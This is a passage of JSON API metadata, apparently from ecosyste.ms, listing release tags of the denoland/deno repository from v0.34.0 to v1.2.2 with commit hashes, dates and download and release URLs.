//repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G